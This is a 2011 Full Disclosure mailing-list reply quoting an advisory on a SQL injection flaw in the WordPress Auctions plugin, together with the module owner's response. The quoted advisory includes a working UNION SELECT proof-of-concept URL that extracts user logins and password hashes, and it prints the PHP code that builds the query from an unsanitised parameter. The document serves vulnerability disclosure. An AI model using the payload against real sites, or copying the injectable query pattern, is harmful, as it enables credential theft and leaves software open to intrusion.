Full Disclosure mailing list archives
Re: WordPress Auctions plugin <= 1.8.8 SQL Injection Vulnerability
From: Henri Salo <henri () nerv fi>
Date: Thu, 15 Sep 2011 16:44:47 +0300
On Wed, Sep 14, 2011 at 04:06:26PM -0300, Heyder[AlligatorTeam] wrote:
# Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection Vulnerability # Date: 2011-09-09 # Author: sherl0ck_ <sherl0ck_[at]alligatorteam[dot]org> @AlligatorTeam # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip # Version: 1.8.8 (tested) --------------- PoC --------------- URL: http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e --------------- Vulnerable code --------------- ... elseif($_GET["wpa_action"] == "edit"): $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"]; ... elseif($_GET["wpa_action"] == "relist"): $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"]; ... $resultList = $wpdb->get_row($strSQL); ...
Module owner replied: "Thanks for raising this with us. The report is right in pointing out that those parameters aren't sanitised (which we will address immediately). It's work pointing out though, that this is an administration module (protected by WordPress's user permissions); rather than one that can be access anonymously." Follow-up: http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622 Best regards, Henri Salo _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- WordPress Auctions plugin <= 1.8.8 SQL Injection Vulnerability Heyder[AlligatorTeam] (Sep 14)
- Re: WordPress Auctions plugin <= 1.8.8 SQL Injection Vulnerability Henri Salo (Sep 15)
